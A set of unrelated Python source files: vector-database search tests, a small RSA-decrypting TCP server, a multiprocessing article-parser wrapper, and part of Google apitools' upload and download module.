params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with a range expr on two fields, one of which does not exist
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
@pytest.mark.level(2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multiple term exprs on the same field, with overlapping values
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multiple term exprs on the same field, with no common values
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with term exprs on different fields, with no entities satisfying both
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float",
values=[float(i) for i in range(default_nb // 2, default_nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build query with a single term expr containing multiple fields
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(default_nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(default_nb // 2, default_nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multiple range exprs on the same field, with overlapping ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multiple range exprs on the same field, with non-overlapping ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with range exprs on different fields, with no entities satisfying both
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build query with a single range expr containing multiple fields
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": default_nb // 2}}
range_second = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, default_top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_partition(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.level(2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.level(2)
def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
# tag = " "
tag = get_invalid_partition
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_tags=tag)
@pytest.mark.level(2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_not_existed_field(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search function, with the wrong top_k
method: search with an invalid top_k value
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
# 1463
@pytest.mark.level(2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search function, with invalid search params
method: search with invalid search params
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
# pytest.skip("skip in FLAT index")
pass
if index_type != search_params["index_type"]:
# pytest.skip("skip if index_type not matched")
pass
entities, ids = init_data(connect, collection, nb=1200)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_with_invalid_params_binary(self, connect, binary_collection):
'''
target: test search function, with an invalid nprobe
method: search with nprobe=0
expected: raise an error, and the connection is normal
'''
nq = 1
index_type = "BIN_IVF_FLAT"
int_vectors, entities, ids = init_binary_data(connect, binary_collection)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
connect.create_index(binary_collection, binary_field_name,
{"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
search_params={"nprobe": 0}, metric_type="JACCARD")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
# #1464
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search function, with empty search params
method: search with empty search params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
# pytest.skip("skip in FLAT index")
pass
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_vectors(self, connect, collection):
"""
target: test search function, with empty search vectors
method: search
expected: raise an exception
"""
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchWithExpression(object):
@pytest.fixture(
scope="function",
params=[1, 10, 20],
)
def limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_normal_expressions(),
)
def expression(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[
{"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
]
)
def index_param(self, request):
return request.param
@pytest.fixture(
scope="function",
)
def search_params(self):
return {"metric_type": "L2", "params": {"nprobe": 10}}
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.create_index(collection, default_float_vec_field_name, index_param)
connect.load_collection(collection)
nq = 10
query_data = entities[2]["values"][:nq]
res = connect.search_with_expression(collection, query_data, default_float_vec_field_name, search_params,
limit, expression)
assert len(res) == nq
for topk_results in res:
assert len(topk_results) <= limit
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
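# Illustrative sketch (added; not part of the original test module): the query DSL
# shape that the cases above build via the gen_default_* helpers. Field names,
# vector dimension, metric and parameter values below are placeholders.
_example_dsl_query = {
    "bool": {
        "must": [
            {"vector": {
                "float_vector": {
                    "topk": 10,
                    "query": [[0.1] * 128],  # one query vector; dim 128 assumed
                    "metric_type": "L2",
                    "params": {"nprobe": 10},
                }
            }},
            {"term": {"int64": {"values": [0, 1, 2]}}},
            {"range": {"int64": {"GT": 0, "LT": 100}}},
        ]
    }
}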
|
server_thread_tcp_mateus.py
|
# TCP server
import socket
import rsa
from threading import Thread
global public_key
global private_key
def captura_chave_privada():
arq = open('/home/mateus/projetos/Fatec/5sem/fateclando/mateus/.chavePriMateus.txt','rb')
# load the key
private_key = bytes()
for linha in arq:
private_key += linha
arq.close()
return private_key
def decifrar_message(msgc):
private_key = captura_chave_privada()
return rsa.decrypt(
msgc,rsa.PrivateKey.load_pkcs1(private_key, format='PEM')
)
def conexao(con, cli):
global public_key
while True:
msg = con.recv(1024)
# stop before trying to decrypt an empty message (connection closed)
if not msg:
break
if b'-----BEGIN RSA PUBLIC KEY-----' in msg:
public_key = msg
else:
print(decifrar_message(msg))
print('Closing connection for client', cli)
con.close()
# Server IP address
def inicia_server():
HOST = ''
PORT = 5004
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
orig = (HOST, PORT)
captura_chave_privada()
tcp.bind(orig)
tcp.listen(1)
while True:
con, cliente = tcp.accept()
print('Connected by', cliente)
t = Thread(target=conexao, args=(con,cliente,))
t.start()
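# Added note: the module above only defines the server and never starts it; a
# minimal entry point (a sketch, not part of the original file) would be:
if __name__ == '__main__':
    inicia_server()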
|
multiprocessing_realisation.py
|
import pikabu_parser_basic as base
from multiprocessing import Process, Queue
import argparse
import time
blocks = 8
def updated_parser(q, l:int, r:int):
data, error_list = base.get_article_range(l, r)
q.put((data, error_list))
def parallel_parser(l:int, r:int):
step = int((r-l)/blocks) + 1
ths = list()
q = Queue()
for i, val in enumerate(range(l, r, step)):
th = Process(target=updated_parser, args=(q, val, min(val+step, r)))
th.start()
ths.append(th)
res_data = None
error_list = list()
for _ in ths:
data, error = q.get()
if res_data is None:
res_data = data
else:
res_data = res_data.append(data)
if error:
error_list += error
for th in ths:
th.join()
return res_data, error_list
if __name__ == '__main__':
base.may_be_main(parallel_parser)
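# Illustrative usage (added): calling the parallel parser directly instead of via
# pikabu_parser_basic.may_be_main. It assumes get_article_range(l, r) returns a
# pandas-like object supporting .append plus a list of failed article ids, as the
# code above expects.
#
#   data, errors = parallel_parser(1, 201)   # articles 1-200 split across `blocks` processes
#   print(len(errors), "articles failed")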
|
transfer.py
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Upload and download support for apitools."""
from __future__ import print_function
import email.generator as email_generator
import email.mime.multipart as mime_multipart
import email.mime.nonmultipart as mime_nonmultipart
import io
import json
import mimetypes
import os
import threading
import six
from six.moves import http_client
from googlecloudsdk.third_party.apitools.base.py import buffered_stream
from googlecloudsdk.third_party.apitools.base.py import exceptions
from googlecloudsdk.third_party.apitools.base.py import http_wrapper
from googlecloudsdk.third_party.apitools.base.py import stream_slice
from googlecloudsdk.third_party.apitools.base.py import util
__all__ = [
'Download',
'Upload',
'RESUMABLE_UPLOAD',
'SIMPLE_UPLOAD',
'DownloadProgressPrinter',
'DownloadCompletePrinter',
'UploadProgressPrinter',
'UploadCompletePrinter',
]
_RESUMABLE_UPLOAD_THRESHOLD = 5 << 20
SIMPLE_UPLOAD = 'simple'
RESUMABLE_UPLOAD = 'resumable'
def DownloadProgressPrinter(response, unused_download):
"""Print download progress based on response."""
if 'content-range' in response.info:
print('Received %s' % response.info['content-range'])
else:
print('Received %d bytes' % response.length)
def DownloadCompletePrinter(unused_response, unused_download):
"""Print information about a completed download."""
print('Download complete')
def UploadProgressPrinter(response, unused_upload):
"""Print upload progress based on response."""
print('Sent %s' % response.info['range'])
def UploadCompletePrinter(unused_response, unused_upload):
"""Print information about a completed upload."""
print('Upload complete')
class _Transfer(object):
"""Generic bits common to Uploads and Downloads."""
def __init__(self, stream, close_stream=False, chunksize=None,
auto_transfer=True, http=None, num_retries=5):
self.__bytes_http = None
self.__close_stream = close_stream
self.__http = http
self.__stream = stream
self.__url = None
self.__num_retries = 5
# Let the @property do validation
self.num_retries = num_retries
self.retry_func = (
http_wrapper.HandleExceptionsAndRebuildHttpConnections)
self.auto_transfer = auto_transfer
self.chunksize = chunksize or 1048576
def __repr__(self):
return str(self)
@property
def close_stream(self):
return self.__close_stream
@property
def http(self):
return self.__http
@property
def bytes_http(self):
return self.__bytes_http or self.http
@bytes_http.setter
def bytes_http(self, value):
self.__bytes_http = value
@property
def num_retries(self):
return self.__num_retries
@num_retries.setter
def num_retries(self, value):
util.Typecheck(value, six.integer_types)
if value < 0:
raise exceptions.InvalidDataError(
'Cannot have negative value for num_retries')
self.__num_retries = value
@property
def stream(self):
return self.__stream
@property
def url(self):
return self.__url
def _Initialize(self, http, url):
"""Initialize this download by setting self.http and self.url.
We want the user to be able to override self.http by having set
the value in the constructor; in that case, we ignore the provided
http.
Args:
http: An httplib2.Http instance or None.
url: The url for this transfer.
Returns:
None. Initializes self.
"""
self.EnsureUninitialized()
if self.http is None:
self.__http = http or http_wrapper.GetHttp()
self.__url = url
@property
def initialized(self):
return self.url is not None and self.http is not None
@property
def _type_name(self):
return type(self).__name__
def EnsureInitialized(self):
if not self.initialized:
raise exceptions.TransferInvalidError(
'Cannot use uninitialized %s', self._type_name)
def EnsureUninitialized(self):
if self.initialized:
raise exceptions.TransferInvalidError(
'Cannot re-initialize %s', self._type_name)
def __del__(self):
if self.__close_stream:
self.__stream.close()
def _ExecuteCallback(self, callback, response):
# TODO(craigcitro): Push these into a queue.
if callback is not None:
threading.Thread(target=callback, args=(response, self)).start()
class Download(_Transfer):
"""Data for a single download.
Public attributes:
chunksize: default chunksize to use for transfers.
"""
_ACCEPTABLE_STATUSES = set((
http_client.OK,
http_client.NO_CONTENT,
http_client.PARTIAL_CONTENT,
http_client.REQUESTED_RANGE_NOT_SATISFIABLE,
))
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'progress', 'total_size', 'url'))
def __init__(self, stream, progress_callback=None, finish_callback=None,
**kwds):
total_size = kwds.pop('total_size', None)
super(Download, self).__init__(stream, **kwds)
self.__initial_response = None
self.__progress = 0
self.__total_size = total_size
self.__encoding = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
@property
def progress(self):
return self.__progress
@property
def encoding(self):
return self.__encoding
@classmethod
def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds):
"""Create a new download object from a filename."""
path = os.path.expanduser(filename)
if os.path.exists(path) and not overwrite:
raise exceptions.InvalidUserInputError(
'File %s exists and overwrite not specified' % path)
return cls(open(path, 'wb'), close_stream=True,
auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds):
"""Create a new Download object from a stream."""
return cls(stream, auto_transfer=auto_transfer, total_size=total_size,
**kwds)
@classmethod
def FromData(cls, stream, json_data, http=None, auto_transfer=None,
**kwds):
"""Create a new Download object from a stream and serialized data."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
download = cls.FromStream(stream, **kwds)
if auto_transfer is not None:
download.auto_transfer = auto_transfer
else:
download.auto_transfer = info['auto_transfer']
setattr(download, '_Download__progress', info['progress'])
setattr(download, '_Download__total_size', info['total_size'])
download._Initialize( # pylint: disable=protected-access
http, info['url'])
return download
@property
def serialization_data(self):
self.EnsureInitialized()
return {
'auto_transfer': self.auto_transfer,
'progress': self.progress,
'total_size': self.total_size,
'url': self.url,
}
@property
def total_size(self):
return self.__total_size
def __str__(self):
if not self.initialized:
return 'Download (uninitialized)'
else:
return 'Download with %d/%s bytes transferred from url %s' % (
self.progress, self.total_size, self.url)
def ConfigureRequest(self, http_request, url_builder):
url_builder.query_params['alt'] = 'media'
# TODO(craigcitro): We need to send range requests because by
# default httplib2 stores entire responses in memory. Override
# httplib2's download method (as gsutil does) so that this is not
# necessary.
http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,)
def __SetTotal(self, info):
if 'content-range' in info:
_, _, total = info['content-range'].rpartition('/')
if total != '*':
self.__total_size = int(total)
# Note "total_size is None" means we don't know it; if no size
# info was returned on our initial range request, that means we
# have a 0-byte file. (That last statement has been verified
# empirically, but is not clearly documented anywhere.)
if self.total_size is None:
self.__total_size = 0
def InitializeDownload(self, http_request, http=None, client=None):
"""Initialize this download by making a request.
Args:
http_request: The HttpRequest to use to initialize this download.
http: The httplib2.Http instance for this request.
client: If provided, let this client process the final URL before
sending any additional requests. If client is provided and
http is not, client.http will be used instead.
"""
self.EnsureUninitialized()
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
url = http_request.url
if self.auto_transfer:
end_byte = self.__ComputeEndByte(0)
self.__SetRangeHeader(http_request, 0, end_byte)
response = http_wrapper.MakeRequest(
self.bytes_http or http, http_request)
if response.status_code not in self._ACCEPTABLE_STATUSES:
raise exceptions.HttpError.FromResponse(response)
self.__initial_response = response
self.__SetTotal(response.info)
url = response.info.get('content-location', response.request_url)
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
self.StreamInChunks()
def __NormalizeStartEnd(self, start, end=None):
if end is not None:
if start < 0:
raise exceptions.TransferInvalidError(
'Cannot have end index with negative start index')
elif start >= self.total_size:
raise exceptions.TransferInvalidError(
'Cannot have start index greater than total size')
end = min(end, self.total_size - 1)
if end < start:
raise exceptions.TransferInvalidError(
'Range requested with end[%s] < start[%s]' % (end, start))
return start, end
else:
if start < 0:
start = max(0, start + self.total_size)
return start, self.total_size - 1
def __SetRangeHeader(self, request, start, end=None):
if start < 0:
request.headers['range'] = 'bytes=%d' % start
elif end is None:
request.headers['range'] = 'bytes=%d-' % start
else:
request.headers['range'] = 'bytes=%d-%d' % (start, end)
def __ComputeEndByte(self, start, end=None, use_chunks=True):
"""Compute the last byte to fetch for this request.
This is all based on the HTTP spec for Range and
Content-Range.
Note that this is potentially confusing in several ways:
* the value for the last byte is 0-based, eg "fetch 10 bytes
from the beginning" would return 9 here.
* if we have no information about size, and don't want to
use the chunksize, we'll return None.
See the tests for more examples.
Args:
start: byte to start at.
end: (int or None, default: None) Suggested last byte.
use_chunks: (bool, default: True) If False, ignore self.chunksize.
Returns:
Last byte to use in a Range header, or None.
"""
end_byte = end
if start < 0 and not self.total_size:
return end_byte
if use_chunks:
alternate = start + self.chunksize - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
if self.total_size:
alternate = self.total_size - 1
if end_byte is not None:
end_byte = min(end_byte, alternate)
else:
end_byte = alternate
return end_byte
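# Worked example (added, illustrative): with chunksize=1048576 and
# total_size=3000000, __ComputeEndByte(0) returns 1048575 (end of the first
# chunk), while __ComputeEndByte(2900000) returns 2999999, because the chunk
# boundary is clamped to total_size - 1.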
def __GetChunk(self, start, end, additional_headers=None):
"""Retrieve a chunk, and return the full response."""
self.EnsureInitialized()
request = http_wrapper.Request(url=self.url)
self.__SetRangeHeader(request, start, end=end)
if additional_headers is not None:
request.headers.update(additional_headers)
return http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
def __ProcessResponse(self, response):
"""Process response (by updating self and writing to self.stream)."""
if response.status_code not in self._ACCEPTABLE_STATUSES:
# We distinguish errors that mean we made a mistake in setting
# up the transfer versus something we should attempt again.
if response.status_code in (http_client.FORBIDDEN,
http_client.NOT_FOUND):
raise exceptions.HttpError.FromResponse(response)
else:
raise exceptions.TransferRetryError(response.content)
if response.status_code in (http_client.OK,
http_client.PARTIAL_CONTENT):
self.stream.write(response.content)
self.__progress += response.length
if response.info and 'content-encoding' in response.info:
# TODO(craigcitro): Handle the case where this changes over a
# download.
self.__encoding = response.info['content-encoding']
elif response.status_code == http_client.NO_CONTENT:
# It's important to write something to the stream for the case
# of a 0-byte download to a file, as otherwise python won't
# create the file.
self.stream.write('')
return response
def GetRange(self, start, end=None, additional_headers=None,
use_chunks=True):
"""Retrieve a given byte range from this download, inclusive.
Range must be of one of these three forms:
* 0 <= start, end = None: Fetch from start to the end of the file.
* 0 <= start <= end: Fetch the bytes from start to end.
* start < 0, end = None: Fetch the last -start bytes of the file.
(These variations correspond to those described in the HTTP 1.1
protocol for range headers in RFC 2616, sec. 14.35.1.)
Args:
start: (int) Where to start fetching bytes. (See above.)
end: (int, optional) Where to stop fetching bytes. (See above.)
additional_headers: (bool, optional) Any additional headers to
pass with the request.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and fetch this range in a single request.
Returns:
None. Streams bytes into self.stream.
"""
self.EnsureInitialized()
progress_end_normalized = False
if self.total_size is not None:
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
else:
progress = start
end_byte = end
while (not progress_end_normalized or end_byte is None or
progress <= end_byte):
end_byte = self.__ComputeEndByte(progress, end=end_byte,
use_chunks=use_chunks)
response = self.__GetChunk(progress, end_byte,
additional_headers=additional_headers)
if not progress_end_normalized:
self.__SetTotal(response.info)
progress, end_byte = self.__NormalizeStartEnd(start, end)
progress_end_normalized = True
response = self.__ProcessResponse(response)
progress += response.length
if response.length == 0:
raise exceptions.TransferRetryError(
'Zero bytes unexpectedly returned in download response')
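# Illustrative examples (added) of the three range forms described above:
# GetRange(0) streams the whole object, GetRange(0, 99) streams the first 100
# bytes, and GetRange(-100) streams the final 100 bytes, each written into
# self.stream chunk by chunk.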
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Stream the entire download in chunks."""
self.StreamMedia(callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers,
use_chunks=True)
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Stream the entire download.
Args:
callback: (default: None) Callback to call as each chunk is
completed.
finish_callback: (default: None) Callback to call when the
download is complete.
additional_headers: (default: None) Additional headers to
include in fetching bytes.
use_chunks: (bool, default: True) If False, ignore self.chunksize
and stream this download in a single request.
Returns:
None. Streams bytes into self.stream.
"""
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
self.EnsureInitialized()
while True:
if self.__initial_response is not None:
response = self.__initial_response
self.__initial_response = None
else:
end_byte = self.__ComputeEndByte(self.progress,
use_chunks=use_chunks)
response = self.__GetChunk(
self.progress, end_byte,
additional_headers=additional_headers)
if self.total_size is None:
self.__SetTotal(response.info)
response = self.__ProcessResponse(response)
self._ExecuteCallback(callback, response)
if (response.status_code == http_client.OK or
self.progress >= self.total_size):
break
self._ExecuteCallback(finish_callback, response)
class Upload(_Transfer):
"""Data for a single Upload.
Fields:
stream: The stream to upload.
mime_type: MIME type of the upload.
total_size: (optional) Total upload size for the stream.
close_stream: (default: False) Whether or not we should close the
stream when finished with the upload.
auto_transfer: (default: True) If True, stream all bytes as soon as
the upload is created.
"""
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'mime_type', 'total_size', 'url'))
def __init__(self, stream, mime_type, total_size=None, http=None,
close_stream=False, chunksize=None, auto_transfer=True,
progress_callback=None, finish_callback=None,
**kwds):
super(Upload, self).__init__(
stream, close_stream=close_stream, chunksize=chunksize,
auto_transfer=auto_transfer, http=http, **kwds)
self.__complete = False
self.__final_response = None
self.__mime_type = mime_type
self.__progress = 0
self.__server_chunk_granularity = None
self.__strategy = None
